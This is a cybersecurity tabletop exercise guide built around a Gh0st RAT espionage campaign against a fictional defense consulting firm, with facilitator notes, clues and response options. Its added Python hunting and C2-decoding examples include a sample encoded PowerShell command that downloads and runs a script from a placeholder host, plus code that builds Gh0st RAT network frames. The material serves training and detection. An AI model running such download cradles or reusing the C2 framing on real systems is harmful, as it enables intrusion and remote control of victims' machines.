Gh0st RAT Scenario: Advanced Corporate Espionage Campaign

InnovaTech Dynamics: Technology consulting firm, 450 employees, specializing in government and defense contracts
APT • Gh0st RAT
STAKES
Classified project data + Intellectual property theft + National security clearances + Client trust
HOOK
InnovaTech Dynamics provides cybersecurity consulting for defense contractors and government agencies. Advanced attackers have established persistent access to their network using sophisticated remote access tools that evade detection by living off legitimate administrative tools and cloud services. The attackers are systematically stealing intellectual property, client data, and sensitive project information while maintaining long-term access for ongoing espionage.
PRESSURE
Security clearance investigations and potential loss of government contracts - any data theft could compromise national security projects
FRONT • 120 minutes • Advanced
NPCs
  • Security Director Amanda Foster (Former NSA): Managing incident response while coordinating with federal investigators, balancing operational security with government oversight requirements
  • Principal Consultant Michael Chen (Cloud Architecture): Discovering that attackers are using legitimate cloud services and administrative tools to maintain persistent access across client environments
  • Compliance Manager Jennifer Torres (Security Clearances): Coordinating with defense contractors and government agencies about potential compromise of classified project data and security clearance implications
  • Lead Engineer Ryan Park (Threat Hunting): Finding evidence of sophisticated adversary tradecraft using living-off-the-land techniques and legitimate remote administration tools
SECRETS
  • Attackers gained initial access through compromised vendor portal used for government contract bidding
  • Remote access tools disguised as legitimate system administration and cloud management utilities
  • Long-term persistent access established across multiple client networks through trusted consulting relationships

Planning Resources

Tip: Comprehensive Facilitation Guide Available

For detailed session preparation support, including game configuration templates, investigation timelines, response options matrix, and round-by-round facilitation guidance, see:

Ghost RAT Corporate Espionage Planning Document

Planning documents provide 30-minute structured preparation for first-time IMs, or quick-reference support for experienced facilitators.

Note: Interactive Scenario Slides

Ready-to-present RevealJS slides with player-safe mode, session tracking, and IM facilitation notes:

Ghost RAT Corporate Espionage Scenario Slides

Press ‘P’ to toggle player-safe mode • Built-in session state tracking • Dark/light theme support


Scenario Details for IMs

InnovaTech Dynamics: Government Contractor Crisis During Security Clearance Review

Organization Profile

  • Type: Technology consulting firm specializing in government contract management, defense systems integration, cybersecurity advisory services, and classified project support for Department of Defense, intelligence agencies, and federal civilian agencies
  • Size: 450 employees: 220 systems engineers and technical consultants holding SECRET and TOP SECRET clearances and supporting classified defense programs; 85 cybersecurity specialists conducting security assessments for government clients; 60 project managers coordinating multi-agency contract deliverables; 40 business development staff pursuing competitive government procurements; 25 facility security officers managing classified information protection protocols; 15 legal and compliance personnel handling federal acquisition regulations; and 5 executive leaders with Top Secret/SCI clearances
  • Annual Operations: $340 million in active government contracts across 28 federal agencies, including Defense Department weapons systems modernization, intelligence community network security assessments, and civilian agency cloud migration projects. InnovaTech holds a facility security clearance (FCL) that enables access to classified materials and requires stringent physical security controls and counterintelligence cooperation. Its consultants operate on-site within 85 government client organizations, accessing sensitive networks and classified systems under trusted relationships. The firm bids through government vendor portal systems that manage competitive procurement for $800 million in annual federal contract opportunities, and it protects intellectual property representing $120 million in cumulative research investment in government technology solutions
  • Current Clearance Crisis: Defense Counterintelligence and Security Agency (DCSA) conducting facility security clearance review next week—any evidence of classified information compromise triggers immediate FCL suspension halting all government contracts and $340 million annual revenue, but APT discovery threatens both security clearance preservation and contractual obligations to government clients

Key Assets & Impact

Asset Category 1: Facility Security Clearance & Government Contract Access - FCL enables $340M in classified contract work, DCSA review scheduled next week determines clearance continuation, APT compromise triggers immediate suspension halting all operations and 450-employee workforce

Asset Category 2: Trusted Client Relationships & On-Site Access - InnovaTech consultants operate within 85 government agencies with privileged network access, APT lateral movement through consulting relationships threatens client classified systems, trust damage eliminates competitive advantage in government market

Asset Category 3: National Security Obligations & Counterintelligence Cooperation - NISPOM regulations require immediate DCSA notification of security incidents, delayed reporting creates a willful violation potentially triggering criminal prosecution of executives, but leadership fears that transparent disclosure will mean FCL suspension and business collapse

Immediate Business Pressure

Monday Morning, 8:00 AM - Five Days Before DCSA Security Review:

Chief Security Officer David Chen discovered Gh0st RAT malware operating across InnovaTech’s corporate networks and government client environments. Gh0st RAT is a remote access tool with a long history in espionage campaigns against government and defense targets; the actor deploying it here had maintained persistent surveillance for the past nine months, compromising vendor portal credentials, monitoring classified project communications, and leveraging InnovaTech’s trusted consulting relationships to infiltrate 12 government agency networks.

DCSA’s facility security clearance review was scheduled for Friday morning. The inspection would validate InnovaTech’s compliance with National Industrial Security Program requirements including incident reporting protocols, classified information protection measures, and counterintelligence cooperation obligations. Leadership assumed that any evidence of security compromise would trigger immediate FCL suspension, halting all government contracts and eliminating InnovaTech’s ability to compete for federal procurements.

But NISPOM regulations required incident notification to DCSA within 24 hours of discovery, creating what leadership saw as an impossible choice: transparent reporting that they feared would collapse the business, or delayed notification that preserved the clearance review but created a willful violation potentially triggering criminal prosecution.

Critical Timeline & Operational Deadlines

  • Nine months ago: Gh0st RAT infiltration via compromised government vendor portal credentials
  • Monday, 8:00 AM (Session Start): APT discovery five days before DCSA clearance review
  • Tuesday (24 hours): NISPOM incident reporting deadline to DCSA
  • Friday, 9:00 AM: DCSA facility security clearance review determining FCL continuation
  • Post-discovery: Government client notification obligations, potential lateral compromise across 12 agencies

Cultural & Organizational Factors

Factor 1: Government vendor portals normalized by procurement processes created trusted credential reuse across client environments

Factor 2: On-site consulting relationships required privileged network access reducing security segmentation between contractor and government systems

Factor 3: Competitive procurement pressure emphasized relationship preservation over transparent security incident disclosure

Factor 4: Facility security clearance dependency created organizational fear of DCSA reporting triggering business-ending FCL suspension

Operational Context

Government contractors operate under National Industrial Security Program regulations that enforce classified information protection through facility clearances, personnel security protocols, and mandatory counterintelligence cooperation. These requirements create legal obligations beyond commercial contract performance: national security protection takes absolute priority over business continuity or competitive positioning, and NISPOM violations can trigger criminal prosecution of executives and permanent FCL revocation.

Key Stakeholders

Stakeholder 1: David Chen - Chief Security Officer

Stakeholder 2: Dr. Sarah Martinez - CEO

Stakeholder 3: Colonel (Ret.) James Williams - VP of Government Programs

Stakeholder 4: DCSA Counterintelligence Investigator

Why This Matters

You’re not just removing APT malware from government contractor networks—you’re determining whether facility security clearance preservation obligations override transparent counterintelligence cooperation when incident reporting threatens business survival for 450-employee defense consulting firm.

You’re not just protecting classified information—you’re defining whether trusted contractor relationships enable APT lateral movement across government agencies, or demonstrate that consulting firms can balance client access privileges against security isolation requirements.

IM Facilitation Notes

1. Emphasize dual stakes—$340M government contracts AND national security protection both at risk

2. Make DCSA review timing tangible—five-day window creates genuine pressure between reporting and clearance preservation

3. Use trusted consulting relationships to explore privilege abuse and lateral movement through business partnerships

4. Present APT as deliberate defense industrial base targeting exploiting vendor access privileges

5. Address government contractor responsibility balancing business survival against counterintelligence cooperation

6. Celebrate transparent DCSA reporting prioritizing national security despite business-ending FCL suspension risk

Opening Presentation

“It’s Monday morning at InnovaTech Dynamics, and your cybersecurity consulting firm provides critical security services to defense contractors and government agencies working on programs that require national security clearances. Your threat hunting team is investigating anomalous network behavior when they discover sophisticated remote access tools masquerading as legitimate cloud administration utilities. Further analysis reveals that attackers have maintained persistent access for months, systematically targeting intellectual property, classified project data, and sensitive client information. What your team does not yet appreciate is how much of this activity rides on living-off-the-land techniques and legitimate cloud services, which makes detection extremely difficult and has allowed long-term corporate espionage that could compromise national security projects.”

Initial Symptoms to Present:

Warning: Initial User Reports
  • “Network monitoring reveals suspicious remote access patterns using legitimate cloud services”
  • “Administrative tools and system utilities showing signs of modification or misuse”
  • “Unusual data access patterns suggesting systematic theft of client project information”
  • “Remote access sessions occurring during non-business hours using legitimate credentials”
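To make these four symptoms concrete for players (and for an IM who wants to show what the Protector or Detective would actually run), here is an added hunting example that is not part of the original scenario materials and is not vendor tooling. It applies the four symptoms as rules over constructed endpoint records: an off-hours RDP logon by a privileged account, a shell spawned by the WMI provider host, an encoded PowerShell command hiding a download cradle, and a binary named like a cloud administration utility running from a user-writable path. The record layout, the account svc_cloudadmin, the binary name AzureCloudManager.exe, the host example.invalid and the 07:00-19:00 working-hours window are all assumptions made for the example.

```python
"""Hunt for living-off-the-land remote access activity in endpoint telemetry.

Added example for this scenario page, not part of the original materials and
not vendor tooling. The event records are constructed; their field names only
loosely follow Windows Security event 4624 (logon) and Sysmon event 1 (process
creation) and are an assumption, not a real log schema.
"""
import base64
import re
from datetime import datetime
from typing import Iterable, List, Optional, Set, Tuple

BUSINESS_START, BUSINESS_END = 7, 19   # assumed working hours (local), Mon-Fri
RDP_LOGON_TYPE = 10                    # 4624 logon type 10 = RemoteInteractive
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
ADMIN_LOOKING = re.compile(r"cloud|azure|aws|admin|manage", re.I)
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)

Finding = Tuple[str, str, str, str]    # (rule, timestamp, user, detail)


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Recover the script behind -enc/-EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_business_hours(ts: str) -> bool:
    t = datetime.fromisoformat(ts)
    return t.weekday() < 5 and BUSINESS_START <= t.hour < BUSINESS_END


def hunt(events: Iterable[dict], privileged_users: Set[str]) -> List[Finding]:
    """Apply the four scenario symptoms as hunt rules and return what fires."""
    findings: List[Finding] = []
    for ev in events:
        user, ts = ev.get("user", ""), ev["ts"]
        if ev["kind"] == "logon":
            # Symptom: remote sessions outside business hours on legitimate credentials.
            if (ev.get("logon_type") == RDP_LOGON_TYPE and user in privileged_users
                    and not is_business_hours(ts)):
                findings.append(("off_hours_privileged_rdp", ts, user, f"RDP from {ev.get('src_ip')}"))
            continue
        image, parent, cmdline = ev.get("image", ""), ev.get("parent", ""), ev.get("cmdline", "")
        # Symptom: system utilities misused; WMI remote execution lands as WmiPrvSE -> shell.
        if parent.lower().endswith("wmiprvse.exe") and image.lower().endswith(("powershell.exe", "pwsh.exe", "cmd.exe")):
            findings.append(("wmi_spawned_shell", ts, user, image))
        # Same symptom: encoded PowerShell hiding a download cradle.
        decoded = decode_encoded_powershell(cmdline)
        if decoded and CRADLE.search(decoded):
            findings.append(("encoded_powershell_cradle", ts, user, decoded))
        # Symptom: tooling named like a cloud administration utility but running from
        # a user-writable path instead of an installed location.
        name = image.rsplit("\\", 1)[-1]
        if ADMIN_LOOKING.search(name) and USER_WRITABLE.search(image):
            findings.append(("admin_tool_from_user_writable_path", ts, user, image))
    return findings


# Constructed sample: one Monday on a consultant workstation (2024-03-04 is a Monday).
SAMPLE_EVENTS = [
    {"ts": "2024-03-04T09:12:00", "kind": "logon", "user": "svc_cloudadmin",
     "logon_type": RDP_LOGON_TYPE, "src_ip": "10.20.5.14"},                  # benign daytime RDP
    {"ts": "2024-03-04T02:41:00", "kind": "logon", "user": "svc_cloudadmin",
     "logon_type": RDP_LOGON_TYPE, "src_ip": "10.20.5.14"},                  # same account at 02:41
    {"ts": "2024-03-04T02:43:10", "kind": "process", "user": "svc_cloudadmin",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')")},
    {"ts": "2024-03-04T02:45:00", "kind": "process", "user": "svc_cloudadmin",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\svc_cloudadmin\AppData\Local\Temp\AzureCloudManager.exe",
     "cmdline": "AzureCloudManager.exe --sync"},
    {"ts": "2024-03-04T14:05:00", "kind": "process", "user": "jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft SDKs\Azure\CLI2\wbin\az.cmd",
     "cmdline": "az login"},                                                 # real CLI, installed path
]

if __name__ == "__main__":
    for rule, ts, user, detail in hunt(SAMPLE_EVENTS, {"svc_cloudadmin"}):
        print(f"{ts} {rule:<36} {user:<16} {detail[:60]}")
```

The daytime RDP session and the installed Azure CLI are left in the sample on purpose: every rule fires on behaviour (time, parent process, path, decoded content), not on the tool name alone, which is the distinction players need to draw when "legitimate cloud administration" shows up as a red herring in the Advanced Challenge template.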

Key Discovery Paths:

Detective Investigation Leads:

  • Digital forensics reveal sophisticated remote access tools disguised as legitimate system administration utilities
  • Network analysis discovers persistent adversary presence using living-off-the-land techniques
  • Data access analysis shows systematic targeting of high-value intellectual property and client information

Protector System Analysis:

  • Endpoint security assessment reveals advanced evasion techniques using legitimate administrative tools
  • Network segmentation analysis shows lateral movement through trusted consulting relationships
  • Client environment security assessment reveals potential compromise of customer networks

Tracker Network Investigation:

  • Adversary behavior analysis reveals advanced persistent threat techniques and professional tradecraft
  • Command and control analysis discovers use of legitimate cloud services for covert communication
  • Attribution analysis suggests nation-state or corporate espionage capabilities and targeting patterns
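For the Tracker’s command-and-control analysis it helps to show the check a practitioner would actually run against the malware this scenario is named for, together with its limit. Classic Gh0st RAT frames each C2 message with a 5-byte tag (the string "Gh0st"), a little-endian 32-bit total frame length, a 32-bit uncompressed length, and a zlib-compressed body. The decoder below is an added example, not code from the original page or from any Gh0st RAT build; the beacon bytes are constructed, and the alternate tag "Ab0st" is invented to stand in for the many forks that change the magic. The attackers in this scenario tunnel through legitimate cloud services, so this header check finds nothing on that channel; it is exactly the "traditional detection" the clues say is being evaded, which is the point players should reach.

```python
"""Decode the classic Gh0st RAT C2 frame format.

Added example for this scenario page; not code from the page or from any
Gh0st RAT build. The beacon payload and the alternate magic are constructed.
"""
import struct
import zlib
from typing import List, Optional, Tuple

GH0ST_MAGIC = b"Gh0st"      # 5-byte tag at the start of every classic frame
HEADER_LEN = 13             # magic(5) + total length(4) + uncompressed length(4)
VARIANT_MAGIC = b"Ab0st"    # constructed: stands in for forks that change the tag


def build_frame(payload: bytes, magic: bytes = GH0ST_MAGIC) -> bytes:
    """Frame a payload the way the classic Gh0st client and controller do."""
    if len(magic) != 5:
        raise ValueError("Gh0st magic is exactly 5 bytes")
    body = zlib.compress(payload)
    total = HEADER_LEN + len(body)          # total length counts the header too
    return magic + struct.pack("<II", total, len(payload)) + body


def parse_frame(data: bytes, magics=(GH0ST_MAGIC,)) -> Optional[Tuple[bytes, bytes]]:
    """Return (magic, decompressed payload), or None if data is not a well-formed frame.

    Rejects truncated or padded captures (declared length != actual length) and
    bodies whose decompressed size disagrees with the header, so a chance
    5-byte match on unrelated traffic is not reported as a hit.
    """
    if len(data) < HEADER_LEN or data[:5] not in magics:
        return None
    total, original = struct.unpack("<II", data[5:HEADER_LEN])
    if total != len(data):
        return None
    try:
        payload = zlib.decompress(data[HEADER_LEN:])
    except zlib.error:
        return None
    if len(payload) != original:
        return None
    return data[:5], payload


def scan_stream(chunks: List[bytes], magics=(GH0ST_MAGIC,)) -> List[Tuple[int, str, Optional[bytes]]]:
    """Classify captured TCP payloads as (index, verdict, decoded payload or None)."""
    out = []
    for i, chunk in enumerate(chunks):
        parsed = parse_frame(chunk, magics)
        out.append((i, "gh0st_frame" if parsed else "no_match", parsed[1] if parsed else None))
    return out


# Constructed beacon: the classic login message carries host details such as the
# computer name and address; only the framing is modelled here, not the field layout.
SAMPLE_BEACON = b"\x01" + b"INNOVATECH-WS17\x00" + b"10.20.5.14\x00"

SAMPLE_STREAM = [
    build_frame(SAMPLE_BEACON),                                  # classic frame: should match
    build_frame(SAMPLE_BEACON, VARIANT_MAGIC),                   # changed tag: misses default signature
    build_frame(SAMPLE_BEACON)[:-3],                             # truncated capture: must not match
    b"GET /health HTTP/1.1\r\nHost: example.invalid\r\n\r\n",    # unrelated traffic
]

if __name__ == "__main__":
    for idx, verdict, payload in scan_stream(SAMPLE_STREAM):
        print(idx, verdict, payload)
    print("with variant tag:", [v for _, v, _ in scan_stream(SAMPLE_STREAM, (GH0ST_MAGIC, VARIANT_MAGIC))])
```

Run it once with the default magic and once with the variant tag added to see why a single-string signature is brittle; then note that none of this applies when the implant speaks HTTPS to a cloud API, which is why the scenario pushes players toward behavioural and baseline-based detection rather than wire signatures.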

Communicator Stakeholder Interviews:

  • Client communications regarding potential compromise of sensitive project data and security clearance implications
  • Federal agency coordination about national security concerns and government contract compliance
  • Legal assessment for breach notification requirements and potential litigation exposure

Mid-Scenario Pressure Points:

  • Hour 1: Defense contractor discovers evidence their classified project data was accessed through InnovaTech network
  • Hour 2: Federal investigators question security clearance status as investigation reveals multi-month espionage campaign
  • Hour 3: Additional clients reporting suspicious activity suggesting lateral movement through consulting relationships
  • Hour 4: Security clearance authority reviewing government contract eligibility due to data breach implications

Evolution Triggers:

  • If response is delayed, attackers may complete systematic theft of all government and defense contractor intellectual property
  • If containment fails, client network compromises may result in national security implications and contract cancellations
  • If federal coordination is inadequate, security clearance revocations could end government consulting business

Resolution Pathways:

Technical Success Indicators:

  • Complete elimination of persistent adversary access using advanced threat hunting techniques
  • Client network security assessment confirming no lateral movement to government contractors
  • Enhanced security monitoring capable of detecting future living-off-the-land attack techniques

Business Success Indicators:

  • Government contracts maintained through transparent incident response and federal coordination
  • Client relationships preserved through proactive notification and security remediation support
  • Security clearances protected demonstrating appropriate national security incident management

Learning Success Indicators:

  • Team understands advanced persistent threat techniques and living-off-the-land detection
  • Participants recognize corporate espionage targeting and intellectual property protection requirements
  • Group demonstrates incident response coordinating with federal investigators and security clearance authorities

Common IM Facilitation Challenges:

If Government Security Implications Are Underestimated:

“Your threat hunting is excellent, but Amanda just received a call from federal investigators. Classified project data may have been stolen, and your security clearances are under review. How does national security context change your response?”

If Client Lateral Movement Is Ignored:

“While removing persistent access from your network, Ryan discovered evidence attackers moved laterally to defense contractor client networks through trusted relationships. How do you handle client compromise through your consulting access?”

If Living-Off-The-Land Techniques Are Missed:

“Michael found that attackers are using legitimate cloud services and administrative tools, evading traditional detection. How do you identify and remove threats that look like normal operations?”

Success Metrics for Session:


Template Compatibility

Quick Demo (35-40 min)

  • Rounds: 1
  • Actions per Player: 1
  • Investigation: Guided
  • Response: Pre-defined
  • Focus: Use the “Hook” and “Initial Symptoms” to quickly establish corporate espionage crisis. Present the “Guided Investigation Clues” at 5-minute intervals. Offer the “Pre-Defined Response Options” for the team to choose from. Quick debrief should focus on recognizing APT techniques and government security implications.

Lunch & Learn (75-90 min)

  • Rounds: 2
  • Actions per Player: 2
  • Investigation: Guided
  • Response: Pre-defined
  • Focus: This template allows for deeper exploration of corporate espionage and government contract security challenges. Use the full set of NPCs to create realistic federal investigation and security clearance pressures. The two rounds allow discovery of client lateral movement and classified data theft, raising stakes. Debrief can explore balance between incident response and national security coordination.

Full Game (120-140 min)

  • Rounds: 3
  • Actions per Player: 2
  • Investigation: Open
  • Response: Creative
  • Focus: Players have freedom to investigate using the “Key Discovery Paths” as IM guidance. They must develop response strategies balancing threat hunting, client relationship protection, federal coordination, and security clearance maintenance. The three rounds allow for full narrative arc including APT discovery, client compromise assessment, and national security implications.

Advanced Challenge (150-170 min)

  • Rounds: 3
  • Actions per Player: 2
  • Investigation: Open
  • Response: Creative
  • Complexity: Add red herrings (e.g., legitimate cloud administration causing false positives). Make containment ambiguous, requiring players to justify federal notification decisions with incomplete forensic evidence. Remove access to reference materials to test knowledge recall of APT behavior and government security principles.

Quick Demo Materials (35-40 min)

Guided Investigation Clues

Clue 1 (Minute 5): “Threat hunting reveals sophisticated remote access tools masquerading as legitimate cloud administration utilities in InnovaTech Dynamics’ network. Digital forensics show persistent adversary presence using living-off-the-land techniques including PowerShell, WMI, and legitimate cloud services. Data access patterns indicate systematic targeting of intellectual property, defense contractor project data, and government security clearance information.”

Clue 2 (Minute 10): “Network analysis discovers attackers maintained persistent access for months through compromised vendor portal used for government contract bidding. Command and control communications use legitimate cloud services making detection extremely difficult. Timeline shows systematic theft of classified project information affecting defense contractors and government agencies with sensitive security clearances.”

Clue 3 (Minute 15): “Defense contractor reports suspicious activity suggesting lateral movement through InnovaTech’s trusted consulting relationships. Federal investigators questioning security clearance status as evidence reveals multi-month corporate espionage campaign targeting national security projects. Security assessment shows client networks potentially compromised through consulting firm access requiring coordinated incident response with government oversight.”


Pre-Defined Response Options

Option A: Complete Threat Hunting & Federal Coordination

  • Action: Conduct comprehensive threat hunting eliminating all persistent adversary access, coordinate with federal investigators about classified data exposure, immediately notify all defense contractor and government clients, implement enhanced security monitoring to detect living-off-the-land techniques.
  • Pros: Completely eliminates advanced persistent threat presence; demonstrates responsible national security incident management; maintains government contracts through transparent federal coordination.
  • Cons: Comprehensive threat hunting requires extensive time affecting consulting operations; federal investigation may result in temporary security clearance suspension; client notifications may damage business relationships.
  • Type Effectiveness: Super effective against APT malmon type; complete adversary removal prevents continued corporate espionage and intellectual property theft.

Option B: Targeted Remediation & Client Security Assessment

  • Action: Remediate confirmed compromised systems, conduct targeted client network security assessments, selectively notify clients with confirmed data exposure, coordinate selective federal reporting while maintaining business operations.
  • Pros: Allows continued government consulting operations during investigation; protects key client relationships through targeted notification; enables focused security response.
  • Cons: Risks continued adversary presence in undetected locations; selective federal coordination may violate security clearance obligations; client trust damaged if lateral movement discovered later.
  • Type Effectiveness: Moderately effective against APT threats; reduces but doesn’t eliminate persistent access; delays complete corporate espionage remediation.

Option C: Business Continuity & Phased Security Response

  • Action: Implement emergency secure consulting operations for government contracts, phase threat hunting by client priority, establish enhanced monitoring while investigating full compromise scope, coordinate gradual federal notification.
  • Pros: Maintains critical government consulting revenue during incident response; protects security clearances through continued operations; enables controlled client communication.
  • Cons: Phased approach extends adversary presence timeline; emergency operations may not prevent continued espionage; gradual notification delays may violate federal coordination requirements.
  • Type Effectiveness: Partially effective against APT malmon type; prioritizes business continuity over complete threat elimination; doesn’t guarantee corporate espionage cessation.

Lunch & Learn Materials (75-90 min, 2 rounds)

Round 1: Advanced Persistent Threat Discovery (40-45 min)

Investigation Clues (Time-Stamped)

T+0 (Round Start):

  • Detective (Digital Forensics): “Host forensics reveal sophisticated remote access tools disguised as legitimate cloud administration utilities, installed after the attackers gained entry with compromised vendor portal credentials. The malware is using PowerShell and WMI for living-off-the-land techniques, making detection extremely difficult. Evidence suggests persistent presence for at least nine months.”
  • Protector (Endpoint Security): “Endpoint analysis shows multiple workstations with modified legitimate administrative tools. Network segmentation reveals lateral movement through trusted consulting relationships to client environments. Defense contractor client networks show suspicious activity patterns matching InnovaTech access timelines.”
  • Tracker (Network Analysis): “Command and control traffic is tunneling through legitimate cloud services (Azure, AWS), so it blends with normal cloud administration traffic and is very hard to separate with traditional signature-based detection. Behavioral analysis shows systematic targeting of intellectual property, classified project data, and security clearance information, much of it outside normal business hours.”
  • Communicator (Stakeholder Coordination): “Security Director Foster reports federal investigators have been contacted due to classified project involvement. Defense contractor clients are demanding immediate briefing. Compliance Manager Torres warns any breach notification could trigger security clearance review affecting government contracts.”

T+15 (Mid-Round Pressure):

  • NPC Event - Principal Consultant Chen: “Michael discovered that attackers compromised the vendor portal used for government contract bidding nine months ago. They’ve been using legitimate cloud management tools to maintain access across multiple client environments through our trusted consulting relationships.”
  • Pressure Event: Defense contractor client calls asking why their classified network security logs show InnovaTech access during non-business hours. They’re threatening to suspend the consulting contract pending investigation.

T+25 (Round Transition Setup):

  • Detective Discovery: “Timeline analysis confirms attackers used vendor portal compromise to establish initial access, then deployed sophisticated RAT disguised as cloud administration tools. They’ve been systematically exfiltrating data from classified government projects.”
  • Critical Decision Point: Team must decide whether to immediately notify all defense contractor clients about potential compromise, risking government contract cancellations, or conduct targeted assessment first.

Response Options for Round 1

Option A: Immediate Federal Coordination & Client Notification

  • Action: Contact federal investigators immediately, notify all defense contractor and government clients about potential compromise, begin comprehensive threat hunting across consulting firm and client environments.
  • Pros: Demonstrates responsible national security incident management; maintains trust through transparency; ensures proper federal coordination for classified data exposure.
  • Cons: Immediate client notification may trigger multiple contract cancellations; federal investigation could suspend security clearances; comprehensive threat hunting disrupts consulting operations.
  • Type Effectiveness: Super effective against APT - establishes proper federal oversight and client protection.
  • Consequences: Leads to Round 2 with federal investigators actively involved, some clients demanding immediate remediation, security clearances under review.

Option B: Targeted Assessment Before Broad Notification

  • Action: Conduct rapid targeted assessment of client compromise scope, coordinate with federal investigators before broad notification, prioritize defense contractor clients with classified project exposure.
  • Pros: Allows evidence gathering before notifications; protects key client relationships through informed communication; enables focused federal coordination.
  • Cons: Delays may violate security clearance obligations; risks additional data theft during assessment; clients may discover compromise independently.
  • Type Effectiveness: Moderately effective against APT - balances investigation with notification requirements.
  • Consequences: Leads to Round 2 with partial client notifications, increased federal pressure for complete disclosure, risk of independent discovery by clients.

Option C: Emergency Secure Operations & Phased Response

  • Action: Implement emergency secure consulting environment for critical government projects, phase threat hunting by client classification level, establish enhanced monitoring while coordinating gradual federal notification.
  • Pros: Maintains critical government consulting revenue; protects highest-risk classified projects first; enables controlled communication timing.
  • Cons: Phased approach extends remediation timeline; emergency operations may not prevent continued espionage; selective notification may violate federal requirements.
  • Type Effectiveness: Partially effective against APT - prioritizes business continuity over complete federal coordination.
  • Consequences: Leads to Round 2 with business operations continuing but federal investigators questioning notification delays, increased risk of security clearance violations.

Facilitation Questions for Round 1

  • “How do living-off-the-land techniques using legitimate cloud services challenge traditional malware detection?”
  • “What are the national security implications of corporate espionage targeting defense contractor consulting relationships?”
  • “How should incident response balance federal coordination requirements with business relationship protection?”
  • “What makes vendor portal compromises particularly dangerous for trusted third-party consulting firms?”

Round 1 Transition Narrative

Based on team’s chosen response option:

If Option A chosen: “Your immediate federal notification and client communication triggers intensive scrutiny. DCSA launches a formal investigation of InnovaTech’s security clearance eligibility. Three defense contractor clients demand immediate on-site remediation. Federal investigators need complete forensic evidence while attackers may still be active in client environments you haven’t yet assessed.”

If Option B chosen: “Your targeted assessment reveals that attackers established persistent access in at least four defense contractor client networks through InnovaTech’s trusted consulting relationships. Federal investigators are demanding complete client notification within 24 hours. One client independently discovered suspicious activity and is now questioning why they weren’t notified immediately.”

If Option C chosen: “Your emergency secure operations prevent immediate contract cancellations, but federal investigators arrive demanding an explanation for notification delays. DCSA questions whether the phased approach violates security clearance obligations. Meanwhile, threat hunting reveals attackers are still active in several client environments you haven’t yet secured.”

Round 2: Client Lateral Movement & Security Clearance Crisis (35-45 min)

Investigation Clues (Time-Stamped)

T+0 (Round Start - Building on Round 1 outcome):

  • Detective (Threat Hunting): “Comprehensive forensic analysis reveals attackers used InnovaTech’s trusted consulting access to move laterally into six defense contractor client networks. They specifically targeted classified project data, including next-generation weapons system designs, cryptographic protocols, and security clearance databases.”
  • Protector (Client Security Assessment): “Client environment analysis shows sophisticated persistence mechanisms across multiple defense contractor networks. Attackers established backup access methods anticipating primary RAT detection. Some classified project data was exfiltrated to foreign intelligence infrastructure.”
  • Tracker (Attribution Analysis): “Command and control infrastructure analysis reveals nation-state or state-sponsored capabilities. The targeting pattern, operational security, and technical sophistication suggest advanced persistent threat with specific intelligence collection objectives focused on defense industrial base.”
  • Communicator (Federal Coordination): “DCSA is formally reviewing InnovaTech’s security clearances for all personnel with classified access. The FBI’s counterintelligence division is investigating potential espionage affecting national security. Multiple defense contractor clients are demanding immediate on-site remediation and financial compensation for the breach.”

T+15 (Mid-Round Pressure):

  • NPC Event - Compliance Manager Torres: “Jennifer reports that the security clearance review could result in suspension of all classified project access within 48 hours unless we demonstrate complete adversary removal and enhanced security controls. Loss of clearances would end our government consulting business entirely.”
  • Pressure Event: Lead defense contractor client discovers classified weapons system data on foreign intelligence network, confirming exfiltration through InnovaTech compromise. They’re threatening legal action and demanding immediate termination of consulting relationship.

T+25 (Round Transition Setup):

  • Critical Business Decision: Security clearance suspension would eliminate 70% of company revenue. Team must balance complete threat remediation with business survival while maintaining federal coordination.
  • Technical Challenge: Removing persistent access from client environments requires coordinating with six different defense contractor security teams, each with different security requirements and operational constraints.

Response Options for Round 2

Option A: Complete Client Remediation & Security Clearance Demonstration

  • Action: Deploy comprehensive threat hunting teams to all six defense contractor client networks, coordinate synchronized adversary removal across all environments, implement enhanced security controls demonstrating security clearance compliance, provide complete forensic evidence to federal investigators.
  • Pros: Demonstrates complete threat elimination to Defense Security Service; maintains security clearances through responsible remediation; preserves critical client relationships through proactive security response.
  • Cons: Comprehensive multi-client remediation requires massive resource investment; some clients may refuse access for coordinated response; federal investigation may still suspend clearances during assessment.
  • Type Effectiveness: Super effective against APT - complete removal across all environments with federal oversight.
  • Business Impact: High short-term cost but preserves government consulting business and security clearances.

Option B: Prioritized Client Security & Federal Evidence Coordination

  • Action: Focus threat hunting on clients with confirmed classified data exfiltration, coordinate targeted forensic evidence for federal investigation, implement enhanced monitoring for remaining clients while phasing full remediation, negotiate security clearance conditional approval during remediation.
  • Pros: Concentrates resources on highest-risk client environments; provides federal investigators with detailed evidence; enables continued business operations during phased remediation.
  • Cons: Phased approach may leave some client environments compromised; federal investigators may demand complete remediation before clearance approval; clients without immediate remediation may terminate contracts.
  • Type Effectiveness: Moderately effective against APT - addresses confirmed compromises but may miss hidden persistence.
  • Business Impact: Moderate cost, maintains some government consulting operations, risk of partial clearance suspension.

Option C: Business Survival & Minimum Viable Remediation

  • Action: Remediate only InnovaTech internal environment completely, provide clients with detection signatures and remediation guidance for their own networks, coordinate minimum viable evidence for federal investigation, negotiate clearance retention through enhanced monitoring and security controls.
  • Pros: Minimizes immediate remediation costs; maintains business operations; transfers client remediation responsibility to affected organizations.
  • Cons: Clients may view approach as negligent; federal investigators unlikely to approve clearance retention with incomplete client remediation; risks continued espionage in client environments.
  • Type Effectiveness: Partially effective against APT - remediates consulting firm but not client lateral movement.
